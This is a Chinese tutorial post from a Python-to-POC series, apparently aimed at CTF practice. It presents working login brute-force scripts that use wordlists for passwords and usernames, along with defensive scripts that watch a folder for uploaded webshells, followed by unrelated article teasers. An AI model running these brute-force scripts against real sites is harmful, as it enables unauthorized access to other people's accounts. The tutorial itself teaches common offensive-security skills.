Python从0到POC编写--实用小脚本02

news2024/12/29 10:21:17

爆破脚本:

爆破脚本也是我们经常使用的东西

这里就简单讲讲后台爆破脚本的编写吧

在编写之前,我们先通过访问网站去看看情况

首先我们可以先登录看看

输入账号 admin ,密码 12345 后

登录失败,提示 用户名或密码错误

images


在输入正确的密码 123456 后,则会跳到用户界面

然后我们可以通过这个信息去判断是否登录成功

images


现在我们有了登录密码,有了判断是否登录成功的信息

还有就是如何构造 post 包

我们可以先用 burp 抓一下看看

现在我们可以看到,这些数据发送到了 /user/logCheck.php 的页面,

很明显这是判断用户名和密码的,

POST 数据为 user=admin&pass=123456&submit=login

images


有了这些信息,就可以写脚本了,

脚本其实跟前面的一些类似,无非就是判断不同

直接来看代码

假设我们知道用户名为 admin ,

那么我们可以直接爆破密码,

使用 format() 函数把密码传进去


# -*- coding: utf-8 -*-

import requests
import time
import re

def login(pwd):

	try:
		headers = {

			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0",
			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
			"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"

		}

		url = "http://www.vd.com/user/logCheck.php"

		login = {"user":"admin","pass":"{}".format(pwd),"submit":"login"}

		r = requests.post(url,headers=headers,data=login)

		r.encoding = 'utf-8'

		if '用户名或密码错误' in r.text:

			print("用户名: " +user+ " 密码: " + pwd +" -----> 登录失败")

		else:

			print("用户名: " +user+ " 密码: " + pwd + " -----> 登录成功")

	except:
		print("用户名: " +user+ " 密码: " + pwd + " -----> 无法访问")

password = open('D:/top100.txt','r')

for pwd in password.readlines():

	pwd = pwd.strip('\n')
	login(pwd)


username.close()

下面是运行结果

images


假设用户名也不知道,那么我们也可以连用户名也一起爆破,

给用户名也加一个 format() 就行了

下面是代码

使用 for 循环来传入用户名和密码进行爆破


import requests
import time
import re

def login(user,pwd):

	try:
		headers = {

			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0",
			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
			"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"

		}

		url = "http://www.vd.com/user/logCheck.php"

		login = {"user":"{}".format(user),"pass":"{}".format(pwd),"submit":"login"}

		r = requests.post(url,headers=headers,data=login)

		r.encoding = 'utf-8'

		if '用户名或密码错误' in r.text:

			print("用户名: " +user+ " 密码: " + pwd +" -----> 登录失败")

		else:

			print("用户名: " +user+ " 密码: " + pwd + " -----> 登录成功")

	except:
		print("用户名: " +user+ " 密码: " + pwd + " -----> 无法访问")

username = open('D:/user.txt','r')

for user in username.readlines():
	user = user.strip('\n')
	password = open('D:/top100.txt','r')
	
	for pwd in password.readlines():

		pwd = pwd.strip('\n')
		login(user,pwd)


username.close()
password.close()

运行结果

验证完 admin 就验证 root

images


文件监控:

在ctf线下赛中,经常会遇到文件上传漏洞,

那么在我们不会修复漏洞的情况下,就会被挂马 getshell了,

然而我们即使知道上传的文件在哪里,

那么也不可能一直守着那个文件夹删除文件,

你删除也没有别人的脚本操作快,你删除时别人已经 getflag 了,

在这种情况下,我们就需要一个文件监控脚本来帮助我们去完成这个操作。


编写思路:

先获取原文件夹里的文件,做一个白名单,

然后监控是否有新增文件


方法一:

先来看看代码,编写思路是这样子的,

将要监控的文件夹复制到其他地方,当作一个白名单,

然后重复比对这两个文件夹里面的内容,

如果在白名单上没有的,那么就是新增的文件,

下面是一个纯监控脚本,如需要后续操作,比如删除,可自行添加


import os
import shutil
import time

def backup(path1,path2):

	global file_list

	if os.path.isdir(path2):  # 判断白名单文件夹是否存在

		file_list = os.listdir(path2)   # 白名单文件

	else:

		shutil.copytree(path1,path2)   # 将 path1 文件复制到 path2 作为白名单
		file_list = os.listdir(path2)  # 白名单文件

def checkfile(file_list):

	while 1:

		check_file = os.listdir(path1)  # 要监控的文件夹
			
		tmp = [file for file in check_file if not file in file_list] # 列表推导式,获取差集

		if tmp: # 判断是否有新增文件
			for file in tmp:
				print('发现新文件 -----> ' + file)
				file_list.append(str(file))       # 避免重复输出
		else:
			pass

	# print(tmp)

	time.sleep(3)  # 每3秒循环一次

if __name__ == '__main__':

	path1 = 'D:/123'  # 要监控的文件夹,123为文件夹名字
	path2 = 'E:/123'  # 白名单路径,123为文件夹名字
	backup(path1,path2)
	checkfile(file_list)

最后效果就是这样子的

images


除了列表推导式,我们还可以用其他方法获取差集,

那就是使用 difference() 函数,

这种方式比列表推导式更高效

代码其实都差不多,这里就不做更多的介绍了


import os
import shutil
import time

def backup(path1,path2):

	global file_list

	if os.path.isdir(path2):  # 判断白名单文件夹是否存在

		file_list = os.listdir(path2)   # 白名单文件

	else:

		shutil.copytree(path1,path2)   # 将 path1 文件复制到 path2 作为白名单
		file_list = os.listdir(path2)  # 白名单文件

def checkfile(file_list):

	while 1:

		check_file = os.listdir(path1)  # 要监控的文件夹
			
		tmp = list(set(check_file).difference(set(file_list))) # 获取差集,check_file 中有,而 file_list 中没有

		if tmp: # 判断是否有新增文件
			for file in tmp:
				print('发现新文件 -----> ' + file)
				file_list.append(str(file))       # 避免重复输出
		else:
			pass

	# print(tmp)

	time.sleep(3)  # 每3秒循环一次

if __name__ == '__main__':

	path1 = 'D:/123'  # 要监控的文件夹,123为文件夹名字
	path2 = 'E:/123'  # 白名单路径,123为文件夹名字
	backup(path1,path2)
	checkfile(file_list)

方法二:

方法一中复制文件夹到其他地方的方式颇为笨重 ,

如果要监控的目录文件非常多,那么就会非常不方便

下面这个方法,不需要复制文件夹也能实现监控效果,

在脚本第一次运行的时候获取一个初始文件列表 file_list

然后在第二次以及后面的运行中获取的文件作为 check_dir

然后再判断两个列表中是否有不相同的文件存在

脚本运行后,你往文件夹丢文件就能看到效果了,脚本默认是 3 秒检测一次。


import os
import time
	
def list_dir(filepath):
	
	global file_list	
	file_list = os.listdir(filepath)  # 获取初始文件列表,作为白名单

def checkfile(filepath):

	while 1:

	 	check_dir = os.listdir(filepath)  # 获取路径下的文件

	 	for file in check_dir:

	 		if str(file) not in str(file_list):
	 			print('发现新文件 -----> ' + file)
	 			file_list.append(str(file))
	 		else:
	 			pass

	 	time.sleep(3)  # 3秒循环一次


if __name__ == '__main__':

	filepath = 'D:/123'    # 要监控的目录路径,D盘下的123文件夹
	list_dir(filepath)
	checkfile(filepath)

效果呢,也是一样的

images


总结:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1657208.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

水质监测设备预警系统

随着工业化进程的加快和城市化水平的提高,水质安全问题愈发受到社会各界的广泛关注。为了确保水资源的清洁与安全,水质监测设备预警系统成为了不可或缺的利器。在这个背景下,HiWoo Cloud平台凭借其先进的技术和卓越的性能,为水质监…

Centos中将UTC的时区改为CTS时区

date命令可以看到现在的时间以及时区,可以看到现在是UTC时区 而想要更改时区那么就要了解tzselect命令 tzselect 是一个 Linux 命令行工具,用于交互式地帮助用户选择并设置系统的时区。这个程序会通过一系列的问题引导用户,从而确定用户所在的…

小程序如何注销

随着移动互联网的深入发展,管控也越来越严格。现在小程序都要求进行ICP备案,不管是新注册的还是以往注册的。很多商家的小程序本身处于无运营状态,现在要求备案,还不如直接注销。下面,将详细介绍小程序注销的步骤和注意…

WPF容器控件之WrapPanel、布局控件

WrapPanel: 换行panel 子元素进行换行&#xff0c;当子元素的宽度或者高度超出了父元素&#xff0c;才进行换行。高度超出父元素的高度 也会另起一列 属性 Orientation布局方式 实例 <WrapPanel Orientation"Horizontal"><Label>C# 是从 C/C 衍生出来的…

Proxmox VE 8 用SDN隔离用户网络

作者&#xff1a;田逸&#xff08;formyz&#xff09; 最新发布的Proxmox VE&#xff08;以下简称PVE&#xff09; 8在Web管理后台集成了易于操作的SDN&#xff08;软件定义网络&#xff09;功能插件&#xff0c;其实质是对不同的PVE用户指定不同的网络&#xff0c;进行逻辑隔离…

低组装直线导轨有哪些应用场景?

低组装直线导轨&#xff0c;是一种用于工业自动化设备中的导轨类型。所谓低组装导轨&#xff0c;是指该导轨的轨道平面高度相对于其他传统导轨较低&#xff0c;其特点是安装方便、维护简单&#xff0c;同时具有较高的稳定性和定位精度。接下来&#xff0c;我们一起来了解低组装…

如何优雅的实现接口限流?

首先限流&#xff0c;其实解决方案有很多&#xff0c;比如通过nginx配置&#xff0c;通过gateway网关进行限流&#xff0c;比如Spring Cloud GateWay整合熔断器实现限流 但是以上都是全局的&#xff0c;如何灵活的针对某些接口进行不同级别的限流呢&#xff1f; 方案一&#…

西汉两个韩信,结局怎么如此相似

西汉军事家、“汉初三杰”韩信是家喻户晓的人物&#xff0c;同时期还有一个韩信&#xff0c;也是战功赫赫&#xff0c;也被封王&#xff0c;史书为了区别&#xff0c;在后一个韩信名字之间加上一个“王”&#xff0c;称为韩王信。韩信是个光芒万丈的人物&#xff0c;韩王信也是…

游戏专用设备指纹方案解析

如同人类拥有独一无二的指纹&#xff0c;设备也有设备的指纹&#xff0c;我们可以把设备指纹理解为设备的唯一识别码。 构建设备指纹需要采集设备硬件信息、软件信息、环境信息、网络信息等维度信息&#xff0c;进行加密/压缩&#xff0c;再通过算法处理&#xff0c;赋予设备唯…

YOLOv9中模块总结补充|SPPELAN

专栏相关代码&#xff1a;目前售价售价69.9&#xff0c;改进点80 专栏介绍&#xff1a;YOLOv9改进系列 | 包含深度学习最新创新&#xff0c;助力高效涨点&#xff01;&#xff01;&#xff01; 1. SPPELAN SPPELAN是YOLOv9作者在SPPF的基础上创新的模块&#xff08;增加了一次…

2024付费进群系统,源码及搭建变现视频课程(教程+源码)

前三节讲解搭建支付对接&#xff0c;后两节讲解一些引流变现的方法&#xff0c;还有一种变现就是帮人搭建这样的平台&#xff0c;因为全网都没有一套完整的视频教怎么搭建的&#xff0c;有也只是文字教程&#xff0c;一般新人根本看不懂&#xff0c;我视频实操演示&#xff0c;…

从“制造”到“智造”:“灯塔”经验助力中国制造业转型升级-转载

作者&#xff1a;Karel Eloot&#xff0c;侯文皓&#xff0c;Francisco Betti&#xff0c;Enno de Boer和Yves Giraud 作为中国实体经济的主体&#xff0c;制造业是推动中国经济发展乃至全球制造业持续增长的重要引擎。站在历史与未来交汇的新起点上&#xff0c;中国制造业将背…

马蹄集oj赛(双周赛第二十六次)

目录 斐波那契数列的组合 三国杀 数列分段 小码哥的跳棋游戏新编 能量供应 小码哥爱数字 最小串 小船过河 摘果子 泼墨淋漓 很重的枪 小码哥的布阵指挥 斐波那契数列的组合 #include<bits/stdc.h> using namespace std;// 斐波那契数列 1 1 2 3 5 8 13 21 34…

初始C++(二)

前言&#xff1a; C相对于C语言还有很多区别&#xff0c;接下来我们继续介绍 函数重载&#xff1a; 很好理解&#xff0c;就是Java中的函数重载。C加了函数的修饰&#xff0c;通过函数修饰规则去找。C语言是直接通过函数名查找&#xff0c;C是通过修饰后的函数名去查找。 引用…

蓝桥青少一月 STEMA-Python 测评第一题

第一题&#xff08;难度系数 2&#xff0c;18 个计分点&#xff09; (注.input()输入函数的括号中不允许添加任何信息) 编程实现&#xff1a; 给定一个正整数 N&#xff0c;输出 N 除以 3 的商。 输入描述&#xff1a;输入一个正整数 N 输出描述&#xff1a;输出 N 除以 3 的商…

Faststone Capture:高效屏幕捕获神器评测【AI写作】

首先&#xff0c;这篇文章是基于笔尖AI写作进行文章创作的&#xff0c;喜欢的宝子&#xff0c;也可以去体验下&#xff0c;解放双手&#xff0c;上班直接摸鱼~ 按照惯例&#xff0c;先介绍下这款笔尖AI写作&#xff0c;宝子也可以直接下滑跳过看正文~ 笔尖Ai写作&#xff1a;…

Cesium 展示——让加载的实体置于顶层,不被其他加载的元素所遮挡,包括地形,一键置顶

文章目录 需求分析需求 本案例中展示了加载了3DTiles后又在其表面添加了一个实体,实体被遮挡,随着视角变换,实体被展示出来,如下图所示 分析 disableDepthTestDistance:指定从相机到禁用深度测试的距离,由于深度测试的存在,我们的对象很多时候会被地形挡住,我们设置dis…

AI电视起风,三星电视打破“隔代飞跃”,在AI纪元再次领跑

作者 | 曾响铃 文 | 响铃说 要说什么是当下最热的话题&#xff0c;刚落下帷幕的北京车展一定是其中之一&#xff0c;除了各类让人眼花缭乱的新车&#xff0c;纷至沓来的各界行业大佬&#xff0c;也让车展话题度被不断拉高。在此之外&#xff0c;此次车展还刮起了一股“旋风”…

Orange3数据可视化(小提琴图)

小提琴图 小提琴图和箱线图类似&#xff0c;用来显示数据分布和概率密度。结合了箱线图和密度图的特征&#xff0c;用来显示数据的分布形状。 输入 数据: 输入数据集 输出 选中的数据: 从图中选中的实例 数据: 增加了一列&#xff0c;显示数据点是否被选中 …

DUX 主题 版本:8.2 WordPress主题优化版

主题下载地址&#xff1a;DUX 主题优化版.zip 支持夜间模式、快讯、专题、百度收录、人机验证、多级分类筛选&#xff0c;适用于垂直站点、科技博客、个人站&#xff0c;扁平化设计、简洁白色、超多功能配置、会员中心、直达链接、自动缩略图